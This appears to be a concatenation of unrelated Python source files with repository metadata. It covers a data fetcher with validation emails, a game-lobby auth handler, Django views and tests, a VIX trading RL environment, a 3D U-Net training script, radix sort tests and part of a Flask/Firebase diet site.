data=json.loads(line)
jsonschema.validate(data, json_schema)
except jsonschema.ValidationError as e:
error = 'json schema validation error: %s' % e
except jsonschema.SchemaError as e:
error = 'json schema error: %s' % e
except ValueError as e:
error = 'invalid json data: %s' % e
if error:
self.send_error_mail(s3path, error, email_list, line)
sys.exit(error)
else:
self.send_success_mail(s3path, email_list)
def send_error_mail(self, filename, error, email_list, line):
subject = "VALIDATION FAILED FOR VERIZON FIOS CHANNEL AKA FILE"
mail_sent = False
html = '<table border=\"1\" style=\"width:100\%\"><tr><th>' + '</th><th>'.join(["File", "Reason", "Record"]) + '</th></tr>'
html += '<tr><td>' + '</td><td>'.join([filename, error, line]) + '</td></tr>'
body = subject + "<br><br>" + html
for i in xrange(self.sending_mail_retries):
try:
vtv_send_html_mail_2(self.logger, self.server, self.sender, email_list, subject, None, body, None)
mail_sent = True
break
except:
self.logger.info("Failed to send mail, retrying in 1 minute")
time.sleep(60)
if mail_sent:
self.logger.info("mail sent successfully")
else:
self.logger.error("Error sending mail server:%s, sender: %s, recipients: %s" % (self.server, self.sender, email_list))
def send_success_mail(self, filename, email_list):
subject = "VALIDATION SUCCESSFULL FOR VERIZON FIOS CHANNEL AKA FILE"
mail_sent = False
html = '<table border=\"1\" style=\"width:100\%\"><tr><th>' + '</th><th>'.join(["File", "Status"]) + '</th></tr>'
html += '<tr><td>' + '</td><td>'.join([filename, "SUCCESS"]) + '</td></tr>'
body = subject + "<br><br>" + html
for i in xrange(self.sending_mail_retries):
try:
vtv_send_html_mail_2(self.logger, self.server, self.sender, email_list, subject, None, body, None)
mail_sent = True
break
except:
self.logger.info("Failed to send mail, retrying in 1 minute")
time.sleep(60)
if mail_sent:
self.logger.info("mail sent successfully")
else:
self.logger.error("Error sending mail server:%s, sender: %s, recipients: %s" % (self.server, self.sender, email_list))
def cleanup(self):
path_suffix_list = [('.', '%s*.log' % self.script_prefix)]
self.move_logs(self.PROCESS_DIR, path_suffix_list)
self.remove_old_dirs(self.PROCESS_DIR, self.logs_dir_prefix,
self.log_dirs_to_keep, check_for_success=False)
def set_options(self):
config_file = os.path.join(self.system_dirs.VTV_ETC_DIR, 'digitalsmith_fetcher.json')
self.parser.add_option('-c', '--config-file', default=config_file,
help='configuration file')
self.parser.add_option('-s', '--section', default='')
self.parser.add_option("--lang", default='' ,help="language data to be used")
def run_main(self):
self.download_data()
self.download_available_id_data()
if self.channel_s3path != '':
self.download_channels_data()
self.archive_data_files(
self.PROCESS_DIR, self.DATA_DIR,
self.tar_files, self.tar_file_prefix,
tgz_creation_only=True
)
if __name__ == "__main__":
vtv_task_main(DigitalSmithFetcher)
|
[
"jitendra.sahu@tivo.com"
] |
jitendra.sahu@tivo.com
|
4ea7bacca0af84e490cf55b3ba916a62c5393dbb
|
3fa480cf996c4f597013f89c31dacdbd1abde153
|
/server/lobby_server_handlers/AuthorizationHandler.py
|
fa2e4abb8eeebaca88304ec5cb6aa2161d248490
|
[] |
no_license
|
einhornus/CrazyGo
|
bdfd3700f912a616384cec1cace822e0a0604e4a
|
a7ffcd6cc75c515e93b7f9ff11ac412d5a0b7d5e
|
refs/heads/master
| 2021-01-20T04:04:43.913605
| 2017-10-05T16:20:26
| 2017-10-05T16:20:26
| 101,261,846
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,488
|
py
|
from Server import *
from utils.Validator import *
from utils.print_utils import *
from utils.db_queries import *
from utils.security import *
from lobby_server_handlers.factory_utils import *
class AuthorizationHandler(Handler):
def get_validator(self):
res = Validator(['id', 'token'])
return res
def get_type(self):
return 'authorize'
def userEntered(self, me, id):
print("New connection from " + str(id))
me.id = id
sendMessageToAllClients(me.factory, "+ "+str(me.id))
if not hasattr(me.factory, "clientProtocols"):
me.factory.clientProtocols = []
me.factory.clientProtocols.append(me)
me.sendLine("all_users "+getAllIdsString(me.factory))
if not hasattr(me.factory, 'games'):
me.factory.games = []
me.sendLine("all_games "+getAllGamesString(me.factory))
def action(self, request, factory, me):
id = request["id"]
token = request["token"]
if check_token(id, token):
if not hasattr(me.factory, "clientProtocols"):
me.factory.clientProtocols = []
for i in range(len(me.factory.clientProtocols)):
if int(id) == me.factory.clientProtocols[i].id:
me.sendLine(print_error(CONNECTION_REPEAT, ""))
return
else:
self.userEntered(me, int(id))
else:
me.sendLine(print_error(SECURITY_ERROR, ""))
|
[
"luckjanovdmitry@yandex.ru"
] |
luckjanovdmitry@yandex.ru
|
83d3d6925c21facfd3766c1e896d23ebf4bf2a33
|
902bb659e6a28a69a228a4fbd89467158a9ebeee
|
/config.py
|
c3d6508971e0eb7194c746e0aa4de628774b23f4
|
[] |
no_license
|
kylepamintuan/django-intro
|
c993b6cd8ab0b912d8c169cc2d409215ef17760f
|
9ea7a3f2f8bbe78580bf23b0ba2b1cc76e6119ec
|
refs/heads/master
| 2022-12-05T08:39:16.316536
| 2020-08-28T23:13:58
| 2020-08-28T23:13:58
| 287,610,142
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 49
|
py
|
import os
MODE = os.getenv('MODE')
# print(MODE)
|
[
"kylepamintuan@gmail.com"
] |
kylepamintuan@gmail.com
|
30660dc6c9d096d6533e3946c6211c6e681d7f76
|
434b373e1b8859a77029346f08108aa959f116ac
|
/curso/concurrente/threads/18.-pool.py
|
ba742838a5128800d13a51bf1e97d333e7c20c77
|
[] |
no_license
|
gamorales/codigo
|
144d72d52a223254bfc9249f7e9e05494857648a
|
bf75a354b5e265cf8fe70b2d497f64df026e18b2
|
refs/heads/main
| 2023-05-11T00:47:33.967454
| 2021-03-22T03:35:00
| 2021-03-22T03:35:00
| 253,639,839
| 0
| 0
| null | 2023-05-01T21:00:08
| 2020-04-06T23:33:49
|
Python
|
UTF-8
|
Python
| false
| false
| 621
|
py
|
import time
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
logging.basicConfig(level=logging.DEBUG, format='%(threadName)s: %(message)s',)
def math_operation(number1, number2):
time.sleep(1)
result = number1 + number2
logging.info(f'Resultado de {number1} + {number2} = {result}')
if __name__ == '__main__':
executor = ThreadPoolExecutor(max_workers=3, thread_name_prefix='facilitos')
executor.submit(math_operation, 10, 20)
executor.submit(math_operation, 40, 50)
executor.submit(math_operation, 100, 200)
executor.submit(math_operation, 60, 70)
|
[
"guilleccep@gmail.com"
] |
guilleccep@gmail.com
|
5ced3b2b63914733332588265f82e868e2cf0a5c
|
6f211bee3274ffea34c7910393770a3ce881f921
|
/contracts/views.py
|
6e1c6a5b4aedbbd9be265a08eb6f39ad30e01029
|
[] |
no_license
|
luizzmizz/dmart
|
7d0266c234a3a02c8ee749f81fdc5872b748cead
|
540ca77d0facaa9fdbe8aa5ad22b8cc8284665ec
|
refs/heads/master
| 2020-06-29T21:43:08.585885
| 2016-09-07T13:45:23
| 2016-09-07T13:45:23
| 67,285,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,428
|
py
|
from django.shortcuts import render
from datetime import datetime
# Create your views here.
from models import query
from django.http import HttpResponse
from django.template import loader
from django.db import connections
import django_tables2 as tables
import os
class mytable(tables.Table):
contract_number=tables.Column()
nuno_name=tables.Column()
active_on=tables.DateColumn()
cancel_on=tables.DateColumn()
billing_start_on=tables.DateColumn()
billing_end_on=tables.DateColumn()
state_name=tables.Column()
status_name=tables.Column()
linea_tec_name=tables.Column()
contacto_name=tables.Column()
owner_name=tables.Column()
created_on=tables.DateColumn()
merge_status=tables.Column()
last_opp_renewal=tables.DateColumn()
contract_version=tables.Column()
class Meta:
attrs = {"class": "paleblue"}
def runQuery(query,params,request):
cursor=connections['nexus'].cursor().execute(query,params)
results = cursor.fetchall()
x = cursor.description
resultsList = []
for r in results:
i = 0
d = {}
while i < len(x):
d[x[i][0].lower()] = r[i]
i = i+1
resultsList.append(d)
cursor.close()
table=mytable(resultsList)
tables.RequestConfig(request,paginate=False).configure(table)
return HttpResponse(loader.get_template('contracts/result.html').render({'result': table,'STATIC_URL':'/static/'}, request))
def index(request):
sdate=request.GET('sdate',datetime.now())
edate=request.GET('edate',datetime.now())
query="""select c.contract_number,c.external_contract_number,c.nuno_name,c.fase,
c.active_on,c.expired_on-1 hey,c.cancel_on,
c.billing_start_on,c.billing_end_on,
c.state_name,c.status_name,
c.linea_tec_name,
c.contacto_name,c.owner_name,c.created_on,c.merge_status,
c.last_opp_renewal,
c.contract_version
from
uni_mscrm.contracts c
where to_number(to_char(c.expired_on-1,'yy'))>=:year
and to_number(to_char(c.active_on,'yy'))<=:year
and c.linea_tec_name in ('Sistemas','Google Enterprise Solutions') """
params={'year':sdate}
return runQuery(query,params,request)
def listqueries(request):
return HttpResponse(loader.get_template('contracts/listqueries.html').render({ 'queries': query.objects.all() }, request))
|
[
"root@srv-gestion-oracle.unitronics.es"
] |
root@srv-gestion-oracle.unitronics.es
|
bf251dd57cbd20ebd5de2318b42b699392cdd06a
|
18d221fa6a935655cf235beacbc514a221a7d57d
|
/backend/tasks/tests.py
|
c7b9d0385ffc624c4deb60742fcb10ed605bf4fd
|
[] |
no_license
|
vruya/jars
|
8ed6e47d48d4fe9f66762f0a9d88f01355c41f84
|
725380ae76e2adfcaa8d46ccae3f50e81b31244e
|
refs/heads/master
| 2023-04-25T06:25:39.272218
| 2021-05-15T09:56:41
| 2021-05-15T09:56:41
| 367,593,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,976
|
py
|
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APITestCase
from rest_framework import status
from tasks.serializers import TaskSerializer
from tasks.models import Task
import json
class ModelTestCase(TestCase):
def testModel(self):
task = Task(name="My Task", description="Test Case")
self.assertEqual(task.name, "My Task")
self.assertEqual(task.description, "Test Case")
self.assertTrue(task.date)
class TaskViewSetTestCase(APITestCase):
def setUp(self):
self.base_data = {
'name' : 'task #1'
}
self.url_name = 'tasks'
def create_task(self):
serializer = TaskSerializer(data=self.base_data)
serializer.is_valid(raise_exception=True)
serializer.save()
return serializer.data
def test_task_create(self):
response = self.client.post(reverse(self.url_name),json.dumps(self.base_data),content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['name'], self.base_data['name'])
self.assertTrue(response.data['date'])
def test_task_detail(self):
self.create_task()
response = self.client.get(reverse(self.url_name))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 1)
def test_task_partial_update(self):
data = self.create_task()
to_update = {
'description' : 'desc for #1'
}
data.update(to_update)
response = self.client.patch(reverse(self.url_name, kwargs={'pk':data['id']}), json.dumps(to_update), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertEqual(response.data['description'], to_update['description'])
self.assertEqual(response.data, data)
|
[
"k4lly2@gmail.com"
] |
k4lly2@gmail.com
|
7138b968dabeeafecdd36463a212e3752ca3a438
|
90e81d270bc061e0f648c004325a0edbc109e772
|
/bookmak/apps.py
|
064189a6d5b396baa2266b0ab34716525b7624ab
|
[] |
no_license
|
nurbergen02/film
|
1439bd4e6401e65e88ac51d2f5e8e1da832fce41
|
822ca563cddd4ca4f9eac808b324d2c32ed3d867
|
refs/heads/master
| 2023-08-21T05:36:39.827526
| 2021-10-29T13:28:54
| 2021-10-29T13:28:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
from django.apps import AppConfig
class BookmakConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'bookmak'
|
[
"kanumetovnurbergen@gmail.com"
] |
kanumetovnurbergen@gmail.com
|
6ddf11a30d77ac956107f13d376e0f5945b8cf27
|
3e81fdf9bbf5d9285da50c6cadb48e87c999baf7
|
/vix/model7/trpo_large_noise/trading_vix_env.py
|
4e9c54c0eab0c259840794f538bbf52332fd49af
|
[] |
no_license
|
huazuhao/policy_gradient_cartpole
|
b665ae0f1a6180dd62a783f28498cfdbd2132ed2
|
b6f757dd787e477012231694764069a9c483c005
|
refs/heads/main
| 2023-06-17T03:19:15.511779
| 2021-07-17T05:20:24
| 2021-07-17T05:20:24
| 364,783,163
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,133
|
py
|
import gym
from gym import spaces
import pandas as pd
import numpy as np
import random
from random import randrange
from sympy.solvers import solve
from sympy import Symbol
class trading_vix_env(gym.Env):
def __init__(self):
super(trading_vix_env,self).__init__()
self.max_trajectory_length_in_days = 100
self.intervals_per_day = 7
self.max_trajectory_length = self.intervals_per_day * self.max_trajectory_length_in_days
#load data
self.index_feature_dataframe = pd.read_csv("full_feature_dataframe.csv")
#observation and action space
self.action_space = spaces.box.Box(
low=0, #no position
high=1, #all in stock
shape=(1,),
dtype=np.float32
)
high_observation = np.asarray([9999]*(self.index_feature_dataframe.shape[1]-6)) #i don't get to observe date,vixy bid/ask, spy bid/ask/mid
self.observation_space = spaces.box.Box(
low=-1*high_observation,
high=high_observation,
dtype=np.float32
)
#other variables
self.current_time_index = None
self.quantity = None #how many vixy shares i own
self.cash = None
self.min_transaction_value = None
self.buy_and_hold_stock_quantity = None
self.current_portfolio_value = None
self.current_trajectory_length = None
self.has_at_least_one_sell = None
def seed(self, seed=None):
np.random.seed(seed)
random.seed(seed)
def reset(self):
#pick a random starting point on the self.index_feature_dataframe
self.current_time_index = randrange(0,self.index_feature_dataframe.shape[0]-self.max_trajectory_length-50) #for some safety margin
observation = self.index_feature_dataframe.iloc[self.current_time_index][2:25].to_numpy()
observation = observation.reshape((-1,1))
current_vixy_sell_price = self.index_feature_dataframe.iloc[self.current_time_index][25] #sell price or bid price
current_vixy_buy_price = self.index_feature_dataframe.iloc[self.current_time_index][26] #buy price or ask price
returned_observation = np.concatenate((observation,[[0]]),axis = 0) #[[0]] because I start off with 0 in vix
#initialize other variables
self.quantity = 0
self.cash = 1e4
self.min_transaction_value = 5e2
self.buy_and_hold_stock_quantity = self.cash/current_vixy_buy_price
value_in_stock = self.quantity*current_vixy_sell_price
self.current_portfolio_value = self.cash + value_in_stock
self.current_trajectory_length = 0
self.has_at_least_one_sell = False
return np.reshape(returned_observation,(-1,))
def step(self,action):
action = np.clip(action, 0, 1)[0]
if self.current_portfolio_value == None:
raise Exception("Please call reset first")
execute_sell = False
execute_buy = False
current_vixy_sell_price = self.index_feature_dataframe.iloc[self.current_time_index][25] #sell price or bid price
current_vixy_buy_price = self.index_feature_dataframe.iloc[self.current_time_index][26] #buy price or ask price
value_in_stock = self.quantity*current_vixy_sell_price
current_percent_value_in_stock = value_in_stock/self.current_portfolio_value
if current_percent_value_in_stock<action:
need_to_buy = True
need_to_sell = False
else:
need_to_buy = False
need_to_sell = True
average_future_price = self.index_feature_dataframe.iloc[self.current_time_index:self.current_time_index+30]
average_future_price = np.mean(average_future_price['vixy_bid_close'])
sell_price_diff_of_new_minus_future = current_vixy_sell_price - average_future_price
if need_to_buy:
x = Symbol('x')
r = solve((value_in_stock+x)/(value_in_stock+x+self.cash-x) - action,x)
r = float(r[0])
if r>self.min_transaction_value:
if r > self.cash:
r = self.cash #cannot buy more than cash
self.cash -= r
bought_quantity = r/current_vixy_buy_price
self.quantity += bought_quantity
execute_buy = True
if need_to_sell:
x = Symbol('x')
r = solve((value_in_stock-x)/(value_in_stock-x+self.cash+x) - action,x)
r = float(r[0])
if r>self.min_transaction_value:
sold_quantity = r/current_vixy_sell_price
if sold_quantity > self.quantity:
sold_quantity = self.quantity
self.quantity -= sold_quantity
self.cash += sold_quantity*current_vixy_sell_price
execute_sell = True
if self.has_at_least_one_sell == False:
self.has_at_least_one_sell = True
self.current_time_index += 1
self.current_trajectory_length += 1
current_vixy_sell_price = self.index_feature_dataframe.iloc[self.current_time_index][25] #sell price or bid price
current_vixy_buy_price = self.index_feature_dataframe.iloc[self.current_time_index][26] #buy price or ask price
value_in_stock = self.quantity*current_vixy_sell_price
self.current_portfolio_value = self.cash + value_in_stock
current_percent_value_in_stock = value_in_stock/self.current_portfolio_value
observation = self.index_feature_dataframe.iloc[self.current_time_index][2:25].to_numpy()
observation = observation.reshape((-1,1))
observation = np.concatenate((observation,[[current_percent_value_in_stock]]),axis = 0)
reward = 0
#when I buy and the stock subsequently rises, then I get a positive reward.
if execute_buy:
reward = sell_price_diff_of_new_minus_future*-1*10
#when I sell and the stock subsequently falls, then I get a positive reward
if execute_sell:
reward = sell_price_diff_of_new_minus_future*10
reward = 0
info = {}
info['current_portfolio'] = self.current_portfolio_value
info['execute_buy'] = execute_buy
info['execute_sell'] = execute_sell
info['current_vix_sell_price'] = current_vixy_sell_price
if self.current_trajectory_length == self.max_trajectory_length:
#the end of this trajectory
done = True
reward = (self.current_portfolio_value/current_vixy_sell_price)-self.buy_and_hold_stock_quantity
returned_observation = np.reshape(observation,(-1,))
print('the reward is',reward)
if self.has_at_least_one_sell == False:
reward = 0
return returned_observation, reward, done, info
done = False
returned_observation = np.reshape(observation,(-1,))
return returned_observation, reward, done, info
def render(self):
pass
def close(self):
pass
|
[
"huazuhao@bitbucket.org"
] |
huazuhao@bitbucket.org
|
9f7b36625f5209f81f3d023fd00f642f97177a60
|
0369374279fb5b2eaf2b87aebbacd9da0bdd5861
|
/nb_pl_args.py
|
03fe87f8fca7c45eca56fecfb2210696e6f72b1f
|
[
"MIT"
] |
permissive
|
icrdr/3D-UNet-Renal-Anatomy-Extraction
|
56f93cfddb9fa42e8acfc75c4ad0ce131812138f
|
50b16151730ec7868b3d3482e4db31e4c1e25412
|
refs/heads/master
| 2022-11-24T14:44:48.501264
| 2020-07-25T08:21:43
| 2020-07-25T08:21:43
| 282,401,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,547
|
py
|
# %%
from tqdm import tqdm, trange
from visualize import grid_plt, sample_plt
from data import CaseDataset
from trainer import DatasetFromSubset, Trainer, predict_3d_tile
from network import generate_paired_features, Unet, ResBlock, ResBlockStack
from loss import DiceCoef, FocalDiceCoefLoss, dice_coef
from torchvision.transforms import Compose
from transform import Crop, resize, rescale, to_one_hot, RandomCrop, ToOnehot, ToNumpy, ToTensor, \
CombineLabels, RandomBrightness, RandomContrast, RandomGamma, RandomRescale, RandomRescaleCrop, \
RandomMirror, pad, crop_pad, to_tensor, to_numpy
import torch
import torch.nn as nn
import torch.optim as optim
from pytorch_lightning.loggers import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping
from pytorch_lightning import Trainer, LightningModule
from datetime import datetime
from argparse import Namespace, ArgumentParser
parser = ArgumentParser()
parser.add_argument('-data', type=str,
default='data/Task00_Kidney/normalized',
dest='data_set_dir',
help='display an integer')
parser.add_argument('-lr', type=float,
default=1e-4,
dest='learning_rate',
help='display an integer')
parser.add_argument('-pool', type=int,
default=4,
dest='num_pool',
help='display an integer')
parser.add_argument('-feature', type=int,
default=30,
dest='num_features',
help='display an integer')
parser.add_argument('-patch-x', type=int,
default=160,
dest='patch_x',
help='Add repeated values to a list')
parser.add_argument('-patch-y', type=int,
default=160,
dest='patch_y',
help='Add repeated values to a list')
parser.add_argument('-patch-z', type=int,
default=80,
dest='patch_z',
help='Add repeated values to a list')
parser.add_argument('-split', type=float,
default=0.2,
dest='valid_split',
help='Add repeated values to a list')
parser.add_argument('-batch', type=int,
default=1,
dest='batch_size',
help='Add repeated values to a list')
parser.add_argument('-worker', type=int,
default=2,
dest='num_workers',
help='Add repeated values to a list')
parser.add_argument('-resume', type=str,
default='',
dest='resume_ckpt',
help='display an integer')
parser.add_argument('-save', type=str,
default='',
dest='save_path',
help='display an integer')
args = parser.parse_args()
print(args)
class Unet3D(LightningModule):
def __init__(self, hparams):
super(Unet3D, self).__init__()
self.hparams = hparams
self.learning_rate = hparams.learning_rate
self.data_set_dir = hparams.data_set_dir
self.loader_kwargs = {'batch_size': hparams.batch_size,
'num_workers': hparams.num_workers,
'pin_memory': True}
self.valid_split = hparams.valid_split
num_pool = hparams.num_pool
num_features = hparams.num_features
patch_size = (hparams.patch_x,
hparams.patch_y,
hparams.patch_z)
def encode_kwargs_fn(level):
num_stacks = max(level, 1)
return {'num_stacks': num_stacks}
paired_features = generate_paired_features(num_pool, num_features)
self.net = Unet(in_channels=1,
out_channels=1,
paired_features=paired_features,
pool_block=ResBlock,
pool_kwargs={'stride': 2},
up_kwargs={'attention': True},
encode_block=ResBlockStack,
encode_kwargs_fn=encode_kwargs_fn,
decode_block=ResBlock)
self.loss = FocalDiceCoefLoss()
self.tr_transform = Compose([
RandomRescaleCrop(0.1,
patch_size,
crop_mode='random',
enforce_label_indices=[1]),
RandomMirror((0.2, 0, 0)),
RandomContrast(0.1),
RandomBrightness(0.1),
RandomGamma(0.1),
CombineLabels([1, 2], 3),
ToTensor()
])
self.vd_transform = Compose([
RandomCrop(patch_size),
CombineLabels([1, 2], 3),
ToTensor()
])
def prepare_data(self):
data_set = CaseDataset(self.data_set_dir)
n_valid = round(len(data_set) * self.valid_split)
valid_subset, train_subset = torch.utils.data.random_split(
data_set, [n_valid, len(data_set)-n_valid])
self.train_set = DatasetFromSubset(train_subset, self.tr_transform)
self.valid_set = DatasetFromSubset(valid_subset, self.vd_transform)
def forward(self, x):
return self.net(x)
def configure_optimizers(self):
return optim.Adam(self.parameters(), lr=self.learning_rate)
def training_step(self, batch, batch_idx):
input, target = batch['image'], batch['label']
output = self.forward(input)
loss = self.loss(output, target)
logs = {'loss': loss}
return {'loss': loss, 'log': logs}
def validation_step(self, batch, batch_idx):
input, target = batch['image'], batch['label']
output = self.forward(input)
loss = self.loss(output, target)
return {'val_loss': loss}
def validation_epoch_end(self, outputs):
val_loss_mean = torch.stack([x['val_loss'] for x in outputs]).mean()
return {'val_loss': val_loss_mean}
def train_dataloader(self):
return torch.utils.data.DataLoader(self.train_set,
shuffle=True,
**self.loader_kwargs)
def val_dataloader(self):
return torch.utils.data.DataLoader(self.valid_set,
**self.loader_kwargs)
model = Unet3D(hparams=args)
# %%
# version = datetime.now().strftime("%y%m%d%H%H%M%S")
# logger = TensorBoardLogger('logs', name='Task00_Kidney_00', version=version)
# checkpoint = ModelCheckpoint('logs/Task00_Kidney_00/%s' % version)
# early_stop = EarlyStopping(patience=100, min_delta=1e-3)
# 'logs/Task00_Kidney_00/lightning_logs/version_0/checkpoints/epoch=7.ckpt'
# 'logs/Task00_Kidney_00/'
resume_ckpt = args.resume_ckpt if args.resume_ckpt else None
save_path = args.save_path if args.ckpt_path else None
trainer = Trainer(gpus=1,
amp_level='O2',
precision=16,
progress_bar_refresh_rate=1,
train_percent_check=1,
max_epochs=500,
min_epochs=100,
# logger=logger,
# checkpoint_callback=checkpoint,
# early_stop_callback=early_stop,
default_save_path=save_path,
resume_from_checkpoint=resume_ckpt
)
trainer.fit(model)
|
[
"icrdr2010@outlook.com"
] |
icrdr2010@outlook.com
|
c1b101f8914fcc60583cb2f36b6db89aa4e3aa9b
|
741ee09b8b73187fab06ecc1f07f46a6ba77e85c
|
/AutonomousSourceCode/data/raw/sort/057d98c9-3f90-4dd0-ab4a-c70c73015106__test_radix_sort.py
|
e703ae7b2fa212cae8724089524582c5ab5b833d
|
[] |
no_license
|
erickmiller/AutomatousSourceCode
|
fbe8c8fbf215430a87a8e80d0479eb9c8807accb
|
44ee2fb9ac970acf7389e5da35b930d076f2c530
|
refs/heads/master
| 2021-05-24T01:12:53.154621
| 2020-11-20T23:50:11
| 2020-11-20T23:50:11
| 60,889,742
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 734
|
py
|
# -*- coding utf-8 -*-
from __future__ import unicode_literals
import pytest
from structures.radix_sort import radix_sort
@pytest.fixture
def sorted_list():
return [i for i in xrange(10)]
@pytest.fixture
def equal_values_list():
return [5, 9, 4, 2, 5, 0, 5, 2, 6, 4]
@pytest.fixture
def random_list():
return [5, 9, 2, 4, 1, 6, 8, 7, 0, 3]
def test_sorted(sorted_list):
radix_sort(sorted_list)
assert sorted_list == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_average(random_list):
radix_sort(random_list)
assert random_list == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_equal_values(equal_values_list):
radix_sort(equal_values_list)
assert equal_values_list == [0, 2, 2, 4, 4, 5, 5, 5, 6, 9]
|
[
"erickmiller@gmail.com"
] |
erickmiller@gmail.com
|
b360b784071501c6a5cd07ded434bf7588c9598d
|
d32c5f7c5f09d890f64f03a7ad16887a32db8bfa
|
/iDiet.py
|
91d400e4405850b772c62b384eef376d68538bb8
|
[] |
no_license
|
CherryPhil/Share-Files
|
33b8ed132f08eff8fd17ec058bf4f12ad7c9227b
|
8e4082b43885297d3840c5926620c33748fe98b4
|
refs/heads/master
| 2021-05-12T19:39:22.909649
| 2018-02-05T13:05:47
| 2018-02-05T13:05:47
| 117,099,483
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,563
|
py
|
from flask import Flask, render_template, request, redirect, url_for, jsonify, session
#Firebase
import firebase_admin
from firebase_admin import credentials, db
from formLogin import LoginForm
from formRegister import RegisterForm
from formProfile import ProfileForm
from postVar import Post
from postVar import Contact
from postVar import User_recipe
from postVar import Announcement
from getPost import postObj
from getPost import contactObj
from getPost import recipeObj
from getPost import announcementsObj
from objRegister import RegisterObject
cred = credentials.Certificate('cred/idiet-229a2-firebase-adminsdk-f5ibn-9f138ec335.json')
default_app = firebase_admin.initialize_app(cred, {
'databaseURL': 'https://idiet-229a2.firebaseio.com/'
})
root = db.reference()
app = Flask(__name__)
#HOME
@app.route("/")
def home():
home_recipe = []
recipes = []
getRecipe = root.child("recipe").get()
for i in getRecipe:
recipeDetail = getRecipe[i]
recipes.append(recipeDetail["likes"])
recipes.sort(key=int, reverse=True)
for iterate in getRecipe:
numberOfLikes = getRecipe[iterate]["likes"]
if numberOfLikes == recipes[0]:
home_recipe.append(getRecipe[iterate])
for iterate in getRecipe:
numberOfLikes = getRecipe[iterate]["likes"]
if numberOfLikes == recipes[1]:
home_recipe.append(getRecipe[iterate])
try:
userId = session["logged_in"]
except KeyError:
return render_template("home.html", list=home_recipe)
users = root.child("users/" + userId).get()
return render_template("home.html", list=home_recipe, user=users)
@app.route('/home/home_health', methods=['POST', 'GET'])
def home_health():
articles = root.child("articles/health").get()
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("home_health.html", articles=articles)
users = root.child("users/" + userId).get()
return render_template("home_health.html", user=users, articles=articles)
adminData = root.child("admins/" + adminID).get()
return render_template('home_health.html', admin=adminData, articles=articles)
@app.route('/home/home_family', methods=['POST', 'GET'])
def home_family():
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("home_family.html")
users = root.child("users/" + userId).get()
return render_template("home_family.html", user=users)
adminData = root.child("admins/" + adminID).get()
return render_template('home_family.html', admin=adminData)
@app.route('/home/home_travel', methods=['POST', 'GET'])
def home_travel():
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("home_travel.html")
users = root.child("users/" + userId).get()
return render_template("home_travel.html", user=users)
adminData = root.child("admins/" + adminID).get()
return render_template('home_travel.html', admin=adminData)
@app.route('/home/home_food', methods=['POST', 'GET'])
def home_food():
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("home_food.html")
users = root.child("users/" + userId).get()
return render_template("home_food.html", user=users)
adminData = root.child("admins/" + adminID).get()
return render_template('home_food.html', admin=adminData)
@app.route("/articleUpdate")
def articleUpdate():
header = request.args.get("header")
content = request.args.get("content")
direct = request.args.get("direct")
articles = root.child("articles/" + direct)
articles.update({
"content": content,
"header": header
})
return jsonify()
#RECIPE (Ernest)
@app.route('/recipe')
def Recipe():
database_recipes = root.child('recipe').get()
name = []
for i in database_recipes:
recipe_detail = database_recipes[i]
name.append(recipe_detail)
try:
userId = session["logged_in"]
except KeyError:
return render_template("recipe.html", name=name)
users = root.child("users/" + userId).get()
return render_template("recipe.html", name=name, user=users)
#HEALTH
@app.route("/health")
def health():
database_recipes = root.child('recipe').get()
database_workout = root.child('workout').get()
try:
userId = session["logged_in"]
except KeyError:
return render_template("health.html", namer=database_recipes, name1=database_workout)
users = root.child("users/" + userId).get()
return render_template("health.html", namer=database_recipes, name1=database_workout, user=users)
@app.route("/updateToFirebase")
def updateToFirebase():
DPS = request.args.get("bmis")
print(DPS)
try:
userId = session["logged_in"]
except KeyError:
return jsonify(False)
users = root.child("users/" + userId)
users.update({"BMIgraph": DPS})
return jsonify(True)
#FUN
@app.route("/fun")
def fun():
try:
userId = session["logged_in"]
except KeyError:
return render_template("fun.html", cha1=-2, cha2=-2, cha3=-2)
users = root.child("users/"+userId).get()
if "challenge1" in users:
cha1 = users["challenge1"]
else:
cha1 = -1
if "challenge2" in users:
cha2 = users["challenge2"]
else:
cha2 = -1
if "challenge3" in users:
cha3 = users["challenge3"]
else:
cha3 = -1
return render_template("fun.html", cha1=cha1, cha2=cha2, cha3=cha3, user=users)
@app.route("/achievement4")
def achievement4():
processList = request.args.get("list")
print(processList)
@app.route("/userScoreProcess")
def userScoreProcess():
processScore = request.args.get("userScore")
questionNum = request.args.get("Qnum")
try:
userId = session["logged_in"]
except KeyError:
return jsonify(-2)
user_db = root.child("users/"+userId)
userInfo = user_db.get()
if not("challenge"+questionNum in userInfo):
user_db.update({"challenge" + questionNum: processScore})
elif userInfo["challenge"+questionNum] > processScore:
return jsonify(userInfo["challenge"+questionNum])
user_db.update({"challenge"+questionNum : processScore})
return jsonify(processScore)
#COMMUNITY
@app.route('/community')
def community():
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("community.html")
users = root.child("users/" + userId).get()
